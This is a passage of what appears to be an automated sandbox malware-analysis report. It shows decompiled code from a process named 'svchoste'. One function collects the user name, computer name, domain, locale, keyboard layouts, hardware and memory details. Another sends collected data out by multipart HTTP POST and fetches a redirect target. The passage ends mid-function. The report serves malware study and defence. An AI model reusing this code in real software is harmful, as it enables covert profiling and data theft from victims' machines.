					_t183 =  *0xba2600; // 0x2d01100
					_push(_t183);
					_push(_v8);
					E00B755C2(__ebx, __edi, __esi, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(__ebx, __edi, __esi, _t266);
					_t61 = E00B8B260(); // executed
					_push(_t61);
					_t184 =  *0xba236c; // 0x2d01148
					_push(_t184);
					_push(_v8);
					E00B755C2(__ebx, __edi, __esi, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push(E00B8B220(_v8));
					_t185 =  *0xba2494; // 0x2d01160
					_push(_t185);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t69 = E00B8B1E0(); // executed
					_push(_t69);
					_t186 =  *0xba2694; // 0x2d01170
					_push(_t186);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push(E00B8B2E0());
					_t187 =  *0xba2550; // 0x2d01188
					_push(_t187);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push(E00B8ABD0(_t155, _t209, _t210));
					_t188 =  *0xba214c; // 0x2d011b0
					_push(_t188);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t81 = E00B8B0E0(); // executed
					_push(_t81);
					_t189 =  *0xba248c; // 0x2d011d8
					_push(_t189);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t85 = E00B8B160(); // executed
					_push(_t85);
					_t190 =  *0xba21f8; // 0x2d011f0
					_push(_t190);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t89 = E00B8B570(); // executed
					_push(_t89);
					_t191 =  *0xba242c; // 0x2d01208
					_push(_t191);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t93 = E00B8B500(); // executed
					_push(_t93);
					_t192 =  *0xba2508; // 0x2d01220
					_push(_t192);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t97 = E00B8AA60(_t155, _t209, _t210); // executed
					_push(_t97);
					_t193 =  *0xba20a4; // 0x2d01238
					_push(_t193);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t194 =  *0xba2564; // 0x2d01258
					_push(_t194);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t104 = E00B8B460(); // executed
					_push(_t104);
					_t195 =  *0xba25c8; // 0x2d012a0
					_push(_t195);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t108 = E00B8B4E0(); // executed
					_push(_t108);
					_t196 =  *0xba2558; // 0x2d012b8
					_push(_t196);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push(E00B8B090());
					_t197 =  *0xba258c; // 0x2d012d8
					_push(_t197);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push(E00B8AF50());
					_t198 =  *0xba2104; // 0x2d012f0
					_push(_t198);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t120 = E00B8B340(_t155, _t209, _t210); // executed
					_push(_t120);
					_t199 =  *0xba21cc; // 0x2d01308
					_push(_t199);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push(E00B8AC40());
					_t200 =  *0xba215c; // 0x2d01318
					_push(_t200);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t201 =  *0xba228c; // 0x2d01330
					_push(_t201);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push(E00B8B610(_t155, _t201, _t209, _t210, 0));
					_t202 =  *0xba2374; // 0x2d01378
					_push(_t202);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t135 = E00B8AFE0(_t155, _t202, _t209, _t210); // executed
					_push(_t135);
					_t203 =  *0xba2310; // 0x2d01390
					_push(_t203);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t204 =  *0xba2348; // 0x2d004a0
					_push(_t204);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t205 =  *0xba2198; // 0x2d004e8
					_push(_t205);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t206 =  *0xba2538; // 0x2d004f8
					_push(_t206);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t207 =  *0xba20d8; // 0x2d013a8
					_push(_t207);
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_push("\n");
					_push(_v8);
					E00B755C2(_t155, _t209, _t210, _t266);
					_t151 = E00B8AC90(_t155, _t209, _t210); // executed
					_push(_t151);
					_push(_v8); // executed
					E00B755C2(_t155, _t209, _t210, _t266); // executed
					_push(_v8); // executed
					E00B75EA3(_t155, _v8, _t209, _t210, _t266); // executed
				}
				_t57 = E00B8A9D0(); // executed
				return _t57;
			}

0x00b8fc30
0x00b8fc30
0x00b8fc30
0x00b8fc34
0x00b8fc3a
0x00b8fc41
0x00b8fc49
0x00b8fc4c
0x00b8fc50
0x00b8fc56
0x00b8fc5c
0x00b8fc60
0x00b8fc61
0x00b8fc69
0x00b8fc71
0x00b8fc72
0x00b8fc7a
0x00b8fc7f
0x00b8fc80
0x00b8fc86
0x00b8fc8a
0x00b8fc8b
0x00b8fc93
0x00b8fc9b
0x00b8fc9c
0x00b8fca9
0x00b8fcaa
0x00b8fcb0
0x00b8fcb4
0x00b8fcb5
0x00b8fcbd
0x00b8fcc5
0x00b8fcc6
0x00b8fcce
0x00b8fcd3
0x00b8fcd4
0x00b8fcda
0x00b8fcde
0x00b8fcdf
0x00b8fce7
0x00b8fcef
0x00b8fcf0
0x00b8fcfd
0x00b8fcfe
0x00b8fd04
0x00b8fd08
0x00b8fd09
0x00b8fd11
0x00b8fd19
0x00b8fd1a
0x00b8fd27
0x00b8fd28
0x00b8fd2e
0x00b8fd32
0x00b8fd33
0x00b8fd3b
0x00b8fd43
0x00b8fd44
0x00b8fd4c
0x00b8fd51
0x00b8fd52
0x00b8fd58
0x00b8fd5c
0x00b8fd5d
0x00b8fd65
0x00b8fd6d
0x00b8fd6e
0x00b8fd76
0x00b8fd7b
0x00b8fd7c
0x00b8fd82
0x00b8fd86
0x00b8fd87
0x00b8fd8f
0x00b8fd97
0x00b8fd98
0x00b8fda0
0x00b8fda5
0x00b8fda6
0x00b8fdac
0x00b8fdb0
0x00b8fdb1
0x00b8fdb9
0x00b8fdc1
0x00b8fdc2
0x00b8fdca
0x00b8fdcf
0x00b8fdd0
0x00b8fdd6
0x00b8fdda
0x00b8fddb
0x00b8fde3
0x00b8fdeb
0x00b8fdec
0x00b8fdf4
0x00b8fdf9
0x00b8fdfa
0x00b8fe00
0x00b8fe04
0x00b8fe05
0x00b8fe0d
0x00b8fe15
0x00b8fe16
0x00b8fe1e
0x00b8fe24
0x00b8fe28
0x00b8fe29
0x00b8fe31
0x00b8fe39
0x00b8fe3a
0x00b8fe42
0x00b8fe47
0x00b8fe48
0x00b8fe4e
0x00b8fe52
0x00b8fe53
0x00b8fe5b
0x00b8fe63
0x00b8fe64
0x00b8fe6c
0x00b8fe71
0x00b8fe72
0x00b8fe78
0x00b8fe7c
0x00b8fe7d
0x00b8fe85
0x00b8fe8d
0x00b8fe8e
0x00b8fe9b
0x00b8fe9c
0x00b8fea2
0x00b8fea6
0x00b8fea7
0x00b8feaf
0x00b8feb7
0x00b8feb8
0x00b8fec5
0x00b8fec6
0x00b8fecc
0x00b8fed0
0x00b8fed1
0x00b8fed9
0x00b8fee1
0x00b8fee2
0x00b8feea
0x00b8feef
0x00b8fef0
0x00b8fef6
0x00b8fefa
0x00b8fefb
0x00b8ff03
0x00b8ff0b
0x00b8ff0c
0x00b8ff19
0x00b8ff1a
0x00b8ff20
0x00b8ff24
0x00b8ff25
0x00b8ff2d
0x00b8ff35
0x00b8ff36
0x00b8ff3e
0x00b8ff44
0x00b8ff48
0x00b8ff49
0x00b8ff51
0x00b8ff59
0x00b8ff5a
0x00b8ff6c
0x00b8ff6d
0x00b8ff73
0x00b8ff77
0x00b8ff78
0x00b8ff80
0x00b8ff88
0x00b8ff89
0x00b8ff91
0x00b8ff96
0x00b8ff97
0x00b8ff9d
0x00b8ffa1
0x00b8ffa2
0x00b8ffaa
0x00b8ffb2
0x00b8ffb3
0x00b8ffbb
0x00b8ffc1
0x00b8ffc5
0x00b8ffc6
0x00b8ffce
0x00b8ffd6
0x00b8ffd7
0x00b8ffdf
0x00b8ffe5
0x00b8ffe9
0x00b8ffea
0x00b8fff2
0x00b8fffa
0x00b8fffb
0x00b90003
0x00b90009
0x00b9000d
0x00b9000e
0x00b90016
0x00b9001e
0x00b9001f
0x00b90027
0x00b9002d
0x00b90031
0x00b90032
0x00b9003a
0x00b90042
0x00b90043
0x00b9004b
0x00b90050
0x00b90054
0x00b90055
0x00b90060
0x00b90061
0x00b90066
0x00b90069
0x00b90071

APIs

Part of subcall function 00B755AB: __fsopen.LIBCMT ref: 00B755B8

_fprintf.LIBCMT ref: 00B8FC61
_fprintf.LIBCMT ref: 00B8FC72

Part of subcall function 00B755C2: __lock_file.LIBCMT ref: 00B75609
Part of subcall function 00B755C2: __stbuf.LIBCMT ref: 00B7568D
Part of subcall function 00B755C2: __output_l.LIBCMT ref: 00B7569D
Part of subcall function 00B755C2: __ftbuf.LIBCMT ref: 00B756A7

Part of subcall function 00B8B260: RegOpenKeyExA.KERNEL32(80000002,02D07018,00000000,00020119,?), ref: 00B8B291
Part of subcall function 00B8B260: RegQueryValueExA.KERNEL32(?,02D06C28,00000000,00000000,?,000000FF), ref: 00B8B2B5
Part of subcall function 00B8B260: RegCloseKey.ADVAPI32(?), ref: 00B8B2BF

_fprintf.LIBCMT ref: 00B8FC8B
_fprintf.LIBCMT ref: 00B8FC9C

Part of subcall function 00B8B220: GetCurrentProcess.KERNEL32(00000000), ref: 00B8B22F
Part of subcall function 00B8B220: IsWow64Process.KERNEL32(00000000), ref: 00B8B236

_fprintf.LIBCMT ref: 00B8FCB5
_fprintf.LIBCMT ref: 00B8FCC6

Part of subcall function 00B8B1E0: GetUserNameA.ADVAPI32(?,00000104), ref: 00B8B205

_fprintf.LIBCMT ref: 00B8FCDF
_fprintf.LIBCMT ref: 00B8FCF0

Part of subcall function 00B8B2E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00B8B30B

_fprintf.LIBCMT ref: 00B8FD09
_fprintf.LIBCMT ref: 00B8FD1A

Part of subcall function 00B8ABD0: _memset.LIBCMT ref: 00B8ABFA
Part of subcall function 00B8ABD0: GetUserDefaultLocaleName.KERNEL32(?,00000055), ref: 00B8AC0B

_fprintf.LIBCMT ref: 00B8FD33
_fprintf.LIBCMT ref: 00B8FD44

Part of subcall function 00B8B0E0: RegOpenKeyExA.KERNEL32(80000002,02D07050,00000000,00020119,?), ref: 00B8B111
Part of subcall function 00B8B0E0: RegQueryValueExA.KERNEL32(?,02D06BC8,00000000,00000000,?,000000FF), ref: 00B8B135
Part of subcall function 00B8B0E0: RegCloseKey.ADVAPI32(?), ref: 00B8B13F

_fprintf.LIBCMT ref: 00B8FD5D
_fprintf.LIBCMT ref: 00B8FD6E

Part of subcall function 00B8B160: GetCurrentHwProfileA.ADVAPI32(?), ref: 00B8B17A
Part of subcall function 00B8B160: GetProcessHeap.KERNEL32(00000000,00000064), ref: 00B8B188
Part of subcall function 00B8B160: HeapAlloc.KERNEL32(00000000), ref: 00B8B18F
Part of subcall function 00B8B160: lstrcat.KERNEL32(?,?), ref: 00B8B1B3

_fprintf.LIBCMT ref: 00B8FD87
_fprintf.LIBCMT ref: 00B8FD98

Part of subcall function 00B8B570: DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?), ref: 00B8B584

_fprintf.LIBCMT ref: 00B8FDB1
_fprintf.LIBCMT ref: 00B8FDC2

Part of subcall function 00B8B500: NetWkstaGetInfo.NETAPI32(00000000,00000064,00000000), ref: 00B8B527

_fprintf.LIBCMT ref: 00B8FDDB
_fprintf.LIBCMT ref: 00B8FDEC

Part of subcall function 00B8AA60: GetProcessHeap.KERNEL32(00000000,000001F4), ref: 00B8AA7A
Part of subcall function 00B8AA60: HeapAlloc.KERNEL32(00000000), ref: 00B8AA81
Part of subcall function 00B8AA60: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00B8AAA2
Part of subcall function 00B8AA60: LocalAlloc.KERNEL32(00000040,?), ref: 00B8AABA
Part of subcall function 00B8AA60: GetKeyboardLayoutList.USER32(?,00000000), ref: 00B8AACE
Part of subcall function 00B8AA60: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B8AB23
Part of subcall function 00B8AA60: wsprintfA.USER32 ref: 00B8AB4C
Part of subcall function 00B8AA60: wsprintfA.USER32 ref: 00B8AB6A
Part of subcall function 00B8AA60: _memset.LIBCMT ref: 00B8AB90
Part of subcall function 00B8AA60: LocalFree.KERNEL32(00000000), ref: 00B8ABA7

_fprintf.LIBCMT ref: 00B8FE05
_fprintf.LIBCMT ref: 00B8FE16
_fprintf.LIBCMT ref: 00B8FE29
_fprintf.LIBCMT ref: 00B8FE3A

Part of subcall function 00B8B460: RegOpenKeyExA.KERNEL32(80000002,02D06FD8,00000000,00020119,?), ref: 00B8B491
Part of subcall function 00B8B460: RegQueryValueExA.KERNEL32(?,02D05F40,00000000,00000000,?,000000FF), ref: 00B8B4B5
Part of subcall function 00B8B460: RegCloseKey.ADVAPI32(?), ref: 00B8B4BF

_fprintf.LIBCMT ref: 00B8FE53
_fprintf.LIBCMT ref: 00B8FE64

Part of subcall function 00B8B4E0: GetSystemInfo.KERNEL32(?), ref: 00B8B4EA

_fprintf.LIBCMT ref: 00B8FE7D
_fprintf.LIBCMT ref: 00B8FE8E
_fprintf.LIBCMT ref: 00B8FEA7
_fprintf.LIBCMT ref: 00B8FEB8

Part of subcall function 00B8AF50: wsprintfA.USER32 ref: 00B8AFB7

_fprintf.LIBCMT ref: 00B8FED1
_fprintf.LIBCMT ref: 00B8FEE2

Part of subcall function 00B8B340: LoadLibraryA.KERNEL32(02D06C58,02D077E0), ref: 00B8B360
Part of subcall function 00B8B340: GetProcAddress.KERNEL32(00000000), ref: 00B8B367
Part of subcall function 00B8B340: _memset.LIBCMT ref: 00B8B381
Part of subcall function 00B8B340: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00B8B39A
Part of subcall function 00B8B340: __aulldiv.LIBCMT ref: 00B8B3B7
Part of subcall function 00B8B340: GlobalMemoryStatus.KERNEL32 ref: 00B8B414
Part of subcall function 00B8B340: wsprintfA.USER32 ref: 00B8B43E

_fprintf.LIBCMT ref: 00B8FEFB
_fprintf.LIBCMT ref: 00B8FF0C

Part of subcall function 00B8AC40: GetSystemPowerStatus.KERNEL32(?), ref: 00B8AC54

_fprintf.LIBCMT ref: 00B8FF25
_fprintf.LIBCMT ref: 00B8FF36
_fprintf.LIBCMT ref: 00B8FF49
_fprintf.LIBCMT ref: 00B8FF5A

Part of subcall function 00B8B610: wsprintfA.USER32 ref: 00B8B691

_fprintf.LIBCMT ref: 00B8FF78
_fprintf.LIBCMT ref: 00B8FF89

Part of subcall function 00B8AFE0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B8AFFA
Part of subcall function 00B8AFE0: HeapAlloc.KERNEL32(00000000), ref: 00B8B001
Part of subcall function 00B8AFE0: _memset.LIBCMT ref: 00B8B025
Part of subcall function 00B8AFE0: GetTimeZoneInformation.KERNEL32(00000000), ref: 00B8B034

_fprintf.LIBCMT ref: 00B8FFA2
_fprintf.LIBCMT ref: 00B8FFB3
_fprintf.LIBCMT ref: 00B8FFC6
_fprintf.LIBCMT ref: 00B8FFD7
_fprintf.LIBCMT ref: 00B8FFEA
_fprintf.LIBCMT ref: 00B8FFFB
_fprintf.LIBCMT ref: 00B9000E
_fprintf.LIBCMT ref: 00B9001F
_fprintf.LIBCMT ref: 00B90032
_fprintf.LIBCMT ref: 00B90043

Part of subcall function 00B8AC90: _memset.LIBCMT ref: 00B8ACB5
Part of subcall function 00B8AC90: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,00000000), ref: 00B8AD12

_fprintf.LIBCMT ref: 00B90055

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: _fprintf$Heap$Process_memsetwsprintf$AllocOpen$CloseInfoNameQueryStatusValue$CurrentGlobalInformationKeyboardLayoutListLocalLocaleMemorySystemUser$AddressComputerDefaultDomainFreeLibraryLoadPowerPrimaryProcProfileRoleTimeWkstaWow64Zone__aulldiv__fsopen__ftbuf__lock_file__output_l__stbuflstrcat
String ID:
API String ID: 1929175539-0
Opcode ID: a85e13db276ce3bfbd80928920c016d92ca0ef457910503e54efce9e087735bb
Instruction ID: 3a64a1de0c3b853fcf9729c724d83474861cd9039392e5133b4b672f4ad9b5bf
Opcode Fuzzy Hash: a85e13db276ce3bfbd80928920c016d92ca0ef457910503e54efce9e087735bb
Instruction Fuzzy Hash: 85B132B6E00604BBCB14FBE8DD83D4E73F95F78700B148498B51DA3261E97AEB149761

Uniqueness

Uniqueness Score: -1.00%

Function 00B92460, Relevance: 40.6, APIs: 17, Strings: 6, Instructions: 306
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00B92460(void* __ebx, void** __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char* _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				char _v52;
				char _v80;
				void* _v84;
				intOrPtr _v88;
				void _v92;
				void* _v96;
				void* _v100;
				char _v128;
				int _v132;
				char _v184;
				long _v188;
				void _v456;
				char* _v460;
				void* _v464;
				long _v468;
				char* _v472;
				void** _v476;
				signed int _t128;
				signed int _t129;
				void* _t147;
				long _t150;
				void* _t158;
				void* _t164;
				long _t169;
				long _t177;
				int _t182;
				void* _t199;
				void* _t271;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t275;
				void* _t281;

				_t272 = __esi;
				_t271 = __edi;
				_t199 = __ebx;
				_push(0xffffffff);
				_push(E00B966A4);
				_push( *[fs:0x0]);
				_t275 = _t274 - 0x1cc;
				_t128 =  *0xba01f4; // 0xac8b3e58
				_t129 = _t128 ^ _t273;
				_v24 = _t129;
				_push(_t129);
				 *[fs:0x0] =  &_v16;
				_v476 = __ecx;
				_t131 = _v476;
				_v476[0xd] = 0;
				if(_v476[0xb] != 0) {
					_v464 = _v476[0xb];
					_push(_v464);
					_t131 = E00B75122();
					_t275 = _t275 + 4;
					_v476[0xb] = 0;
				}
				E00B91740(_t131, _v476, "--");
				E00B91740(E00B91740( &(_v476[4]), _v476,  &(_v476[4])), _v476, "--\r\n");
				E00B711C0( &_v52, _a4);
				_v8 = 0;
				_v88 = E00B71EE0( &_v52, "http://", 0);
				_t281 = _v88 -  *0xb9d8c4; // 0xffffffff
				if(_t281 != 0) {
					E00B71B90( &_v52, _v88, 7);
				}
				_v88 = E00B71370( &_v52, 0x2f, 0);
				E00B71F30( &_v52,  &_v80, 0, _v88);
				_v8 = 1;
				E00B71B90( &_v52, 0, _v88);
				E00B71E10( &(_v476[0x11]), 0x104, _a4, 0x103);
				_v20 = 0;
				if(_v476[0xe] != 0) {
					_v20 = _v20 | 0x00000003;
				}
				_t257 = _v476;
				_t147 = InternetOpenA(_v476[3], _v20, _v476[0xe], 0, 0); // executed
				_v84 = _t147;
				if(_v84 != 0) {
					_v92 = 1;
					InternetSetOptionA(_v84, 0x41,  &_v92, 4);
					_t257 = _v476;
					_t158 = InternetConnectA(_v84, E00B71330( &_v80), 0x50, _v476[0xf], _v476[0x10], 3, 0, 1); // executed
					_v96 = _t158;
					if(_v96 != 0) {
						InternetSetOptionA(_v96, 0x41, 1, 0);
						_t164 = HttpOpenRequestA(_v96, "POST", E00B71330( &_v52), 0, 0, 0, 0x400000, 1); // executed
						_v100 = _t164;
						if(_v100 != 0) {
							E00B917A0(_t199, _v476, _t271, _t272, _v100);
							E00B711C0( &_v128, "Content-Type: multipart/form-data; boundary=");
							_v8 = 2;
							E00B71EC0( &_v128,  &(_v476[4]));
							_t169 = E00B71350( &_v128);
							HttpAddRequestHeadersA(_v100, E00B71330( &_v128), _t169, 0x20000000);
							E00B74F9A(_v476[2],  &_v184, 0x32, 0xa);
							E00B71EA0( &_v128, "Content-Length: ");
							E00B71EC0( &_v128,  &_v184);
							_t177 = E00B71350( &_v128);
							HttpAddRequestHeadersA(_v100, E00B71330( &_v128), _t177, 0x20000000);
							_t182 = HttpSendRequestA(_v100, 0, 0,  *_v476, _v476[2]); // executed
							_v132 = _t182;
							if(_v132 != 0) {
								_v188 = 0x104;
								if(HttpQueryInfoA(_v100, 0x2e,  &_v456,  &_v188, 0) != 0) {
									InternetCloseHandle(_v100);
									 *((char*)(_t273 + _v188 - 0x1c4)) = 0;
									_v460 = E00B71E50( &_v456, "http");
									E00B71E10( &(_v476[0x11]), 0x104, _v460, 0x103);
									_v100 = InternetOpenUrlA(_v84, _v460, 0, 0, 0x400000, 0);
								}
								if(_v100 != 0) {
									E00B91CF0(_t199, _v476, _t271, _t272, _v100); // executed
								}
							}
							InternetCloseHandle(_v100); // executed
							_v8 = 1;
							E00B712D0( &_v128);
						}
						_t257 = _v96;
						InternetCloseHandle(_v96);
					}
					InternetCloseHandle(_v84);
				}
				if(_v476[0xd] <= 0) {
					_v472 = 0;
					_v8 = 0;
					E00B712D0( &_v80);
					_v8 = 0xffffffff;
					E00B712D0( &_v52);
					_t150 = _v472;
				} else {
					_v468 = 1;
					_v8 = 0;
					E00B712D0( &_v80);
					_v8 = 0xffffffff;
					E00B712D0( &_v52);
					_t150 = _v468;
				}
				 *[fs:0x0] = _v16;
				return E00B74354(_t150, _t199, _v24 ^ _t273, _t257, _t271, _t272);
			}

0x00b92460
0x00b92460
0x00b92460
0x00b92463
0x00b92465
0x00b92470
0x00b92471
0x00b92477
0x00b9247c
0x00b9247e
0x00b92481
0x00b92485
0x00b9248b
0x00b92491
0x00b92497
0x00b924a8
0x00b924b3
0x00b924bf
0x00b924c0
0x00b924c5
0x00b924ce
0x00b924ce
0x00b924e0
0x00b92505
0x00b92511
0x00b92516
0x00b9252c
0x00b92532
0x00b92538
0x00b92543
0x00b92543
0x00b92554
0x00b92564
0x00b92569
0x00b92576
0x00b92593
0x00b9259b
0x00b925ac
0x00b925b4
0x00b925b4
0x00b925c9
0x00b925d3
0x00b925d9
0x00b925e0
0x00b925e6
0x00b925f9
0x00b9260f
0x00b92628
0x00b9262e
0x00b92635
0x00b92645
0x00b9266a
0x00b92670
0x00b92677
0x00b92687
0x00b92694
0x00b92699
0x00b926aa
0x00b926b7
0x00b926ca
0x00b926e5
0x00b926f5
0x00b92704
0x00b92711
0x00b92724
0x00b92745
0x00b9274b
0x00b92752
0x00b92758
0x00b92780
0x00b92786
0x00b92792
0x00b927ae
0x00b927cf
0x00b927f3
0x00b927f3
0x00b927fa
0x00b92806
0x00b92806
0x00b927fa
0x00b9280f
0x00b92815
0x00b9281c
0x00b9281c
0x00b92821
0x00b92825
0x00b92825
0x00b9282f
0x00b9282f
0x00b9283f
0x00b92870
0x00b9287a
0x00b92881
0x00b92886
0x00b92890
0x00b92895
0x00b92841
0x00b92841
0x00b9284b
0x00b92852
0x00b92857
0x00b92861
0x00b92866
0x00b92866
0x00b928bb
0x00b928d0

APIs

__mbstowcs_l.LIBCMTD ref: 00B92593
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 00B925D3
InternetSetOptionA.WININET(00000000,00000041,00000001,00000004), ref: 00B925F9
InternetConnectA.WININET(00000000,00000000,00000050,?,?,00000003,00000000,00000001), ref: 00B92628
InternetSetOptionA.WININET(00000000,00000041,00000001,00000000), ref: 00B92645
HttpOpenRequestA.WININET(00000000,POST,00000000,00000000,00000000,00000000,00400000,00000001), ref: 00B9266A
InternetCloseHandle.WININET(00000000), ref: 00B92825

Part of subcall function 00B917A0: HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00B917FA
Part of subcall function 00B917A0: HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00B91828
Part of subcall function 00B917A0: HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00B91856
Part of subcall function 00B917A0: HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00B91884

HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00B926CA
__itow_s.LIBCMT ref: 00B926E5

Part of subcall function 00B74F9A: _xtoa_s@20.LIBCMT ref: 00B74FBD

HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00B92724
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00B92745
HttpQueryInfoA.WININET(00000000,0000002E,?,00000104,00000000), ref: 00B92778
InternetCloseHandle.WININET(00000000), ref: 00B92786
__mbstowcs_l.LIBCMTD ref: 00B927CF

Part of subcall function 00B71E10: __cftof.LIBCMT ref: 00B71E23

InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00400000,00000000), ref: 00B927ED
InternetCloseHandle.WININET(00000000), ref: 00B9280F
InternetCloseHandle.WININET(00000000), ref: 00B9282F

Strings

http://, xrefs: 00B9251F
Content-Length: , xrefs: 00B926ED
POST, xrefs: 00B92661
--, xrefs: 00B924FA
http, xrefs: 00B9279A
Content-Type: multipart/form-data; boundary=, xrefs: 00B9268C

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: HttpInternet$Request$Headers$CloseHandle$Open$Option__mbstowcs_l$ConnectInfoQuerySend__cftof__itow_s_xtoa_s@20
String ID: --$Content-Length: $Content-Type: multipart/form-data; boundary=$POST$http$http://
API String ID: 463163979-1095625359
Opcode ID: 64ec87e6ebed67e87190556cf171316f7d053ff0c76b9b28a139189ae4fa66af
Instruction ID: abfe644d00bba85792513594854996a58690ff94c19f07e34da8e46d94b762d7
Opcode Fuzzy Hash: 64ec87e6ebed67e87190556cf171316f7d053ff0c76b9b28a139189ae4fa66af
Instruction Fuzzy Hash: ABD11871A00218ABDB14EBA8CC96FEEB7B5BF04700F108599F519BB291DB746E84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00B8E0E0, Relevance: 36.4, APIs: 24, Instructions: 367
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00B8E0E0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v48;
				char _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v352;
				intOrPtr _v356;
				intOrPtr* _v360;
				intOrPtr _v364;
				char _v392;
				intOrPtr* _v396;
				intOrPtr* _v400;
				char _v401;
				char _v402;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr* _v416;
				intOrPtr* _v420;
				char _v421;
				char _v422;
